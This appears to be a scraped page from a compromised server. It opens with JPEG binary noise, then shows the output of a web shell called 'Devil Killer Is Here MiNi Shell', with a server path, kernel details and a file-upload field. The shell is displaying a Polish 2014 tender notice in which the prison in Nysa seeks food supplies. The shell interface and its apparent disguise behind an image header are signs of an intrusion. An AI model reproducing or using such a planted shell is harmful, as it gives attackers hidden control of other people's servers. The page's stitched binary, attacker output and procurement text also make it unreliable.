JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140418/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140418/85909-N-2014.html

<p class="kh_header"><b>Nysa: Artykuły spożywcze</b><br>
<b>Numer ogłoszenia: 85909 - 2014; data zamieszczenia: 18.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny w Nysie , ul. Kościuszki 4a, 48-300 Nysa, woj. opolskie, tel. 077 4332471.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka sektora finansów publicznych.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Artykuły spożywcze.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są dostawy artykułów spożywczych na potrzeby Zakładu Karnego  w Nysie. 
Lp, przedmiot zamówienia, kod CPV, jm, ilość

Część 1 Tłuszcze roślinne
1. Olej roślinny spożywczy do smażenia i sałatek, gramatura jednostkowa 1 l, 3 l, 5 l  zg. z PN. kl/gat. I,  l   2.400
2. Margaryna do smarowania pieczywa/masło roślinne - o minimalnej zawartości tłuszczu roślinnego  od 60 do 80%, kostka 250g, zg. z PN. kl/gat. I,  kg  7.800 

Część 2  Mąka - kasze 
1.Maka pszenna -  typ 500- gramatura jednostkowa od 1do 50 kg, zg. z PN. kl/gat. I,  kg 2.700
2.Kasza jęczmienna średnia- gramatura jednostkowa od 1do 25 kg, zg. z PN. kl/gat. I, kg 3.600
3.Kasza manna- gramatura jednostkowa od 1do 25 kg, zg. z PN. kl/gat. I, kg 1.200
4.Ryż biały długoziarnisty- gramatura jednostkowa od 1do 50 kg, zg. z PN. kl/gat. I, kg 2.300
5.Płatki owsiane- gramatura jednostkowa od 1 do 25 kg, zg. z PN. kl/gat. I, kg 800
6.Płatki kukurydziane - gramatura jednostkowa od 0,1 do 10 kg, zg. z PN. kl/gat. I, kg 100
7.Suchary bezcukrowe niesłodzone bez konserwantów -  gramatura jednostkowa od 0,1 do 1 kg, zg. z PN. kl/gat. I, kg 20
8.Kasza jaglana z prosa - gramatura jednostkowa od 0,2 do 1 kg, zg. z PN. kl/gat. I,  kg 3,
9.Wafle ryżowe bezcukrowe niesłodzone bez konserwantów -  gramatura jednostkowa od 0,1 do 1 kg, zg. z PN. kl/gat. I, kg 50 .
10.Kasza  kukurydziana -  gramatura jednostkowa od 0,2 do 1 kg, zg. z PN. kl/gat. I,  kg 10,
11.Kasza gryczana -  gramatura jednostkowa od 0,2 do 1 kg, zg. z PN. kl/gat. I, kg 10,
12. Płatki ryżowe -  gramatura jednostkowa od 0,2 do 1 kg, zg. z PN. kl/gat. I,  kg 3,
13. Mąka ziemniaczana -  gramatura jednostkowa od 0,2 do 1 kg, zg. z PN. kl/gat. I,  kg 30.

Część 3    Makarony 
1.Makaron bezjajeczny nitki - gramatura jednostkowa min. od 5 do 15kg, zg. z PN. kl/gat. I, kg 1.200
2.Makaron bezjajeczny świder - mały  - gramatura jednostkowa min. od 5do 15 kg, zg. z PN. kl/gat. I,  kg 4.700

Część 4    Zupy
1.Rosół wołowy - koncentrat,baza, wydajność min.40l z 1 kg, gramatura jednostkowa od 1do 2 kg, zg. z PN. kl/gat. I,  kg 365
2.Rosół drobiowy -koncentrat,baza, wydajność min.40l z 1 kg, gramatura jednostkowa od 1do 2 kg, zg. z PN. kl/gat. I,  kg 400
3.Żurek w proszku - koncentrat, baza. Półprodukt do sporządzenia żurku, wydajność min.16,50l z 1 kg -gramatura jednostkowa od 0,5kg do  2kg, zg. z PN. kl/gat. I,  kg 400               
4.Zupa szparagowa - koncentrat, baza, wydajność min.10 l z 1 kg- gramatura jednostkowa od 0,5kg do 2 kg, zg. z PN. kl/gat. I,  kg 100  
5.Zupa kalafiorowa - koncentrat, baza, wydajność min.10 l z 1 kg- gramatura jednostkowa od 0,5kg do 2 kg, zg. z PN. kl/gat. I, kg 100     
6.Zupa bieszczadzka - koncentrat, baza, wydajność min.10 l z 1 kg- gramatura jednostkowa od 0,5kg do 2kg, zg. z PN. kl/gat. I, kg 100
7.Zupa brokułowa - koncentrat, baza, wydajność min.10 l z 1 kg- gramatura jednostkowa od 0,5kg do 2 kg, zg. z PN. kl/gat. I,  kg 100
8.Zupa pieczarkowa - koncentrat, baza, wydajność min.10 l z 1 kg- gramatura jednostkowa od 0,5kg do 2 kg, zg. z PN. kl/gat. I, kg 100

Część 5    Warzywa suszone
1. Włoszczyzna suszona - kostka min. 5 warzyw w składzie - gramatura jednostkowa od 0,50 do 15 kg, zg. z PN. kl/gat. I, kg 150
2. Marchew suszona -  kostka- gramatura jednostkowa od  5 do 15 kg, zg. z PN. kl/gat. I, kg 100
3. Burak czerwony suszony - kostka  - gramatura jednostkowa od  5  do 15 kg, zg. z PN. kl/gat. I, kg 50
4. Natka pietruszki suszona - gramatura jednostkowa od  5 do 15 kg, zg. z PN. kl/gat. I, kg 50
5 Koper suszony - mielony - gramatura jednostkowa od  5 do 15 kg, zg. z PN. kl/gat. I, kg 20

Część  6   Warzywa przetworzone
1.Fasolka konserwowa szparagowa  - gramatura jednostkowa od  0,35 do 4 kg, zg. z PN. kl/gat. I, kg 500
2.Groszek konserwowy  - gramatura jednostkowa od  0,35 do 4 kg, zg. z PN. kl/gat. I,  kg 450
3.Kukurydza konserwowa  - gramatura jednostkowa od  0,35 do 4 kg, zg. z PN. kl/gat. I,  kg 450
4.Papryka konserwowa- ćwiartki lub paski  - gramatura jednostkowa od  0,35 do 4 kg, zg. z PN. kl/gat. I,  kg 650
5.Sałatka szwedzka  - gramatura jednostkowa od  0,90 do 4 kg, zg. z PN. kl/gat. I,  kg 600
6.Sałatka wielowarzywna min 3 składnikowa, (dodatek do  II -go dania) - gramatura jednostkowa od  0,90 do 4 kg, zg. z PN. kl/gat. I,  kg 600
7.Chrzan tarty  - gramatura jednostkowa od  0,25 do 0,90 kg, zg. z PN. kl/gat. I,  kg 300
8.Ogórki konserwowe - gramatura jednostkowa od  0,90 do 4 kg, zg. z PN. kl/gat. I,  kg 1.800
9.Pasztet sojowy -  gramatura jednostkowa od 0,09 do 0,113 kg, zg. z PN. kl/gat. I,  kg 7,
10.Pasztet sojowy z koperkiem- gramatura jednostkowa od 0,09 do 0,113 kg, zg.zPN. kl/gat. I, kg 7, 
11.Pasztet sojowy z papryką- gramatura jednostkowa od 0,09 do 0,113 kg,zg. z PN. kl/gat. I,  kg 7,
12.Pasztet sojowy z pomidorem-gramatura jednostkowa od 0,09 do 0,113 kg, zg.z PN.kl/gat.I, kg 7,
13.Pasztet sojowy z pieczarkami-gramatura jednostkowa od 0,09 do 0,113 kg,zg.zPN. kl/gat. I,kg 7,

Cześć 7  Przyprawy
1.Bazylia suszona mielona -  gramatura jednostkowa od  0,10 do 1 kg, zg. z PN. kl/gat. I, kg 20
2.Czosnek granulowany - gramatura jednostkowa od  0,50 do 2 kg, zg. z PN. kl/gat. I, kg 45
3.Oregano suszone mielone - gramatura jednostkowa od  0,10 do 1 kg, zg. z PN. kl/gat. I,  kg 10
4.Pieprz czarny prawdziwy, mielony - gramatura jednostkowa od 0,50 do do 2 kg, zg. z PN. kl/gat. I, kg 180
5.Ziele angielskie -  gramatura jednostkowa  od 0,50 do 2 kg, zg. z PN. kl/gat. I, kg 20
6.Liść laurowy -  gramatura jednostkowa od 0,50 do 2 kg, zg. z PN. kl/gat. I,kg 20
7.Majeranek -  gramatura jednostkowa od 0,50 do 2 kg, zg. z PN. kl/gat. I, kg 50
8.Papryka czerwona, słodka, przyprawa - gramatura jednostkowa od 0,50 do 2 kg, zg. z PN. kl/gat.I, kg 20 
9.Przyprawa do bigosu -  gramatura jednostkowa od 0,50 do 2 kg, zg. z PN. kl/gat. I, kg 10
10.Przyprawa do drobiu -  gramatura jednostkowa od 0,50 do 2 kg, zg. z PN. kl/gat. I, kg 20
11.Przyprawa do fasoli -  gramatura jednostkowa  od 0,50 do 1 kg, zg. z PN. kl/gat. I, kg 10
12.Przyprawa do gulaszu -  gramatura jednostkowa od 0,50 do 2 kg, zg. z PN. kl/gat.I, kg 20 
13.Przyprawa do mięsa mielonego -gramatura jednostkowa od 0,50 do 2 kg,zg. z PN. kl/gat.I,kg 20
14.Przyprawa do ryb -  gramatura jednostkowa  od 0,50 do 2 kg, zg. z PN. kl/gat. I, kg 4
15.Przyprawa do zup w płynie- gramatura jednostkowa 1 kg, zg. z PN. kl/gat. I,  kg 1.000
16.Przyprawa warzywna do zup i potraw - w proszku/sypka/ - gramatura jednostkowa od 3 do 5 kg, zg. z PN. kl/gat. I, kg 480
17.Sól spożywcza jodowana, warzona- gramatura jednostkowa 1 kg, zg. z PN. kl/gat. I, kg 720
18.Ocet spirytusowy 10% - gramatura jednostkowa  od 0,5 do  1 l, zg. z PN. kl/gat. I, l   360

Cześć 8    Różne artykuły spożywcze
1.Herbata czarna granulowana - gramatura jednostkowa od 0,50 do 15 kg, opakowanie papierowe, zg. z PN. kl/gat. I, kg 360
2.Musztarda - gramatura jednostkowa od 0,5 do  5 kg, zg. z PN. kl/gat. I,  kg 1.000
3.Ketchup - gramatura jednostkowa od 0,50 do 5 kg, zg. z PN. kl/gat. I, kg 1.000
4.Dżem wioloowocowy/różne smaki/- gramatura jednostkowa od 0,30 do 15 kg, zg. z PN. kl/gat. I, kg 1.500 
5.Marmolada wioloowocowa/różne smaki/- gramatura jednostkowa od 0,30 do 15 kg, zg. z PN. kl/gat. I,  kg 1.700.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 03.20.00.00-3, 15.30.00.00-1, 15.40.00.00-2, 15.60.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oceny spełnienia tego warunku zamawiający dokona na podstawie złożonego oświadczenia wymienionego w pkt. 6.1 SIWZ, będącego załącznikiem Nr 2 do SIWZ; z formułą  spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oceny spełnienia tego warunku zamawiający dokona na podstawie złożonego oświadczenia wymienionego w pkt. 6.1 SIWZ, będącego załącznikiem Nr 2 do SIWZ; z formułą  spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oceny spełnienia tego warunku zamawiający dokona na podstawie złożonego oświadczenia wymienionego w pkt. 6.1 SIWZ, będącego załącznikiem Nr 2 do SIWZ; z formułą  spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oceny spełnienia tego warunku zamawiający dokona na podstawie złożonego oświadczenia wymienionego w pkt. 6.1 SIWZ, będącego załącznikiem Nr 2 do SIWZ; z formułą  spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oceny spełnienia tego warunku zamawiający dokona na podstawie złożonego oświadczenia wymienionego w pkt. 6.1 SIWZ, będącego załącznikiem Nr 2 do SIWZ; z formułą  spełnia / nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oprócz oświadczenia i spełnieniu warunków udziału w postępowaniu o których mowa w pkt. III.3.1 do III.3.5 i dokumentów określonych w pkt. III.4 wykonawca przedkłada: aktualne dokumenty potwierdzające uprawnienia osób podpisujących ofertę, o ile nie wynikają z przepisów lub innych dokumentów rejestrowych; wypełnione formularze ofertowe według danych zawartych w załącznikach nr 5a,5b,5c,5d,5e,5f,5g,5h do SIWZ; podpisany/parafowany projekt umowy - z wykorzystaniem wzoru - załącznik nr 6 do SIWZ. Zamawiający dopuszcza możliwość powierzenia przez wykonawcę wykonania części zamówienia lub całości zamówienia podwykonawcom. W takim przypadku wykonawca zobowiązuje się do wskazania w swojej ofercie części zamówienia (zakresu) których wykonanie zamierza powierzyć podwykonawcom. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z innymi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. Jeżeli wykonawca, wskazując spełnienie warunków, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, zamawiający, w celu oceny, czy wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia i oceny, czy stosunek łączący wykonawcę z innymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, żąda dokumentów dotyczących w szczególności: a) zakresu  dostępnych wykonawcy zasobów innego podmiotu, b) sposobu wykorzystania zasobów innego podmiotu przez wykonawcę przy wykonaniu zamówienia, c) charakter stosunku, jaki będzie łączył wykonawcę z innym podmiotem, d) zakresu i okresu udziału podmiotu przy wykonaniu zamówienia. W przypadku gdy podmioty te będą brały udział w realizacji zamówienia zobowiązane są złożyć dokumenty wymienione w pkt III.4.  Wykonawcy mogą również wspólnie ubiegać się o udzielenie zamówienia/ przez dwa lub więcej podmioty gospodarcze(konsorcja, spółki cywilne).  W odniesieniu do wymagań postawionych przez Zamawiającego, każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia winien spełniać wszystkie wymagania określone w SIWZ i złożyć dokumenty wymienione wyżej w pkt. III.3, III.4, przy czym dokumenty wymienione w pkt. III.3.1 do III.3.5 składa co najmniej jeden z tych wykonawców, albo wszyscy wykonawcy wspólnie, natomiast dokumenty wymienione w pkt III.4 winny być  złożone przez każdego wykonawcę - partnera z osobna. Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich wykonawców występujących wspólnie. Podmioty występujące wspólnie ponoszą solidarną odpowiedzialność za nie wykonanie lub nienależyte wykonanie zobowiązań.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany ceny artykułów na wniosek jednej ze stron złożony nie później niż 14 dni przed wprowadzeniem  zmian. Możliwość  zmiany ceny wymienionej w § 1 pkt. 4 umowy może nastąpić, nie wcześniej jednak niż po 3 miesiącach licząc od dnia podpisania umowy, nie częściej niż raz na kwartał i nie więcej niż o wartość wskaźnika cen towarów i usług konsumpcyjnych  ustalonego przez Prezesa GUS za poprzedni kwartał.
Zamawiający dopuszcza również możliwość zmiany cen artykułów w przypadku zmiany stawki podatku od towarów i usług (VAT) na skutek zmiany jej wysokości dokonanych ustawą o podatku od towarów i usług.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zp.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Karny  48- 300 Nysa  ul. Kościuszki 4a    Dział Kwatermistrzowski   lub na stronie internetowej:www.zp.sw.gov.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.04.2014 godzina 12:00, miejsce: Sekretariat lub Brama Główna Zakładu Karnego 48 - 300 Nysa ul. Kościuszki 4a.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Tłuszcze roślinne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Olej roślinny spożywczy do smażenia i sałatek, gramatura jednostkowa 1 l, 3 l, 5 l  zg. z PN. kl/gat. I,  l   2.400
2. Margaryna do smarowania pieczywa/masło roślinne - o minimalnej zawartości tłuszczu roślinnego  od 60 do 80%, kostka 250g, zg. z PN. kl/gat. I, kg  7.800.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.41.22.00-1, 15.41.11.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Mąka - kasze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Maka pszenna -  typ 500- gramatura jednostkowa od 1do 50 kg, zg. z PN. kl/gat. I,  kg 2.700
2.Kasza jęczmienna średnia- gramatura jednostkowa od 1do 25 kg, zg. z PN. kl/gat. I, kg 3.600
3.Kasza manna- gramatura jednostkowa od 1do 25 kg, zg. z PN. kl/gat. I,  kg 1.200
4.Ryż biały długoziarnisty- gramatura jednostkowa od 1do 50 kg, zg. z PN. kl/gat. I, kg 2.300
5.Płatki owsiane- gramatura jednostkowa od 1 do 25 kg, zg. z PN. kl/gat. I, kg 800
6.Płatki kukurydziane - gramatura jednostkowa od 0,1 do 10 kg, zg. z PN. kl/gat. I, kg 100
7.Suchary bezcukrowe niesłodzone bez konserwantów -  gramatura jednostkowa od 0,1 do 1 kg, zg. z PN. kl/gat. I, kg 20
8.Kasza jaglana z prosa - gramatura jednostkowa od 0,2 do 1 kg, zg. z PN. kl/gat. I,  kg 3,
9.Wafle ryżowe bezcukrowe niesłodzone bez konserwantów -  gramatura jednostkowa od 0,1 do 1 kg, zg. z PN. kl/gat. I, kg 50 .
10.Kasza  kukurydziana -  gramatura jednostkowa od 0,2 do 1 kg, zg. z PN. kl/gat. I,  kg 10,
11.Kasza gryczana -  gramatura jednostkowa od 0,2 do 1 kg, zg. z PN. kl/gat. I,  kg 10,
12. Płatki ryżowe -  gramatura jednostkowa od 0,2 do 1 kg, zg. z PN. kl/gat. I,  kg 3,
13. Mąka ziemniaczana -  gramatura jednostkowa od 0,2 do 1 kg, zg. z PN. kl/gat. I, kg 30..</p></li>
